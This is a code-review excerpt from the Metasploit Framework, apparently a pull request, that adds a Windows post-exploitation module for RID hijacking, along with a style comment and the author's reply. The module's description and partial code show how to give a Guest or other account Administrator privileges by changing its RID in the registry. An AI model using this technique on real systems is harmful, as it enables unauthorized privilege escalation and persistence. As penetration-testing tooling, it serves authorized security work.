modules/post/windows/manage/rid_hijack.rb

```diff
@@ -0,0 +1,188 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Post
+  include Msf::Post::Windows::Registry
+  include Msf::Post::Windows::Priv
+
+  def initialize(info={})
+    super( update_info( info,
+      'Name'          => 'Windows Manage RID Hijacking',
+      'Description'   => %q{
+        This module will create an entry on the target by modifying some properties
+        of an existing account. It will change the account attributes by setting a
+        Relative Identifier (RID), which should be owned by one existing
+        account on the destination machine.
+
+        Taking advantage of some Windows Local Users Management integrity issues,
+        this module will allow to authenticate with one known account
+        credentials (like GUEST account), and access with the privileges of another
+        existing account (like ADMINISTRATOR account), even if the spoofed account is
+        disabled.
+      },
+      'License'       => MSF_LICENSE,
+      'Author'        => 'Sebastian Castro <sebastian.castro[at]cslcolombia.com>',
+      'Platform'      => [ 'win' ],
+      'SessionTypes'  => [ 'meterpreter' ],
+      'References'	=> [
+        [ 'URL', 'http://csl.com.co/rid-hijacking/']
+      ]
+    ))
+
+    register_options(
+    [
+      OptBool.new('GETSYSTEM',   [true,  'Attempt to get SYSTEM privilege on the target host.', false]),
+      OptBool.new('GUEST_ACCOUNT',   [true,  'Assign the defined RID to the Guest Account.', false]),
+      OptString.new('USERNAME',  [false, 'User to set the defined RID.']),
+      OptString.new('PASSWORD',  [false, 'Password to set to the defined user account.']),
+      OptInt.new('RID', [true, 'RID to set to the specified account.', 500]),
+    ])
+  end
+
+  def get_system
+    results = session.priv.getsystem
+    if results[0]
+      return true
+    else
+      return false
+    end
+  end
+
+  def get_name_from_rid(reg_key, rid, names_key)
+    names_key.each do |name|
+      skey = registry_getvalinfo(reg_key + "\\Names\\#{name}", "")
+      rid_user = skey['Type']
+      if rid_user == rid
+        return name
+      end
+    end
+    return nil
+  end
+
+  def get_user_rid(reg_key, username, names_key)
+    names_key.each do |name|
+      if (name.casecmp(username) == 0)
+        print_good("Found #{name} account!")
+        skey = registry_getvalinfo(reg_key + "\\Names\\#{name}", "")
+        rid = skey['Type']
+        return rid
+        if not skey
+          print_error("Could not open user's key")
```

Comment:
FYI, I suggest running rubocop on this code, as there are some ruby-centric sylistic issues: https://github.com/rapid7/metasploit-framework/wiki/Using-Rubocop
Nothing bad, since it is a lot of "ruby-isms" like parentheses, whitespace, etc.  Please read through the rubocop usage and then take a look at the suggestions from rubocop.  Like it says in the wiki, we are not looking for 0 offenses, as sometimes, rubocop can be a bit overzealous, but if you ignore suggestions, there should be a reason for doing so.

Reply:
This code is executed when the module runs with `GUEST_ACCOUNT false` and `USERNAME` set. That's the case when you want to modify the attributes of a custom local account (even another built-in account) instead of the **Guest** built-in account.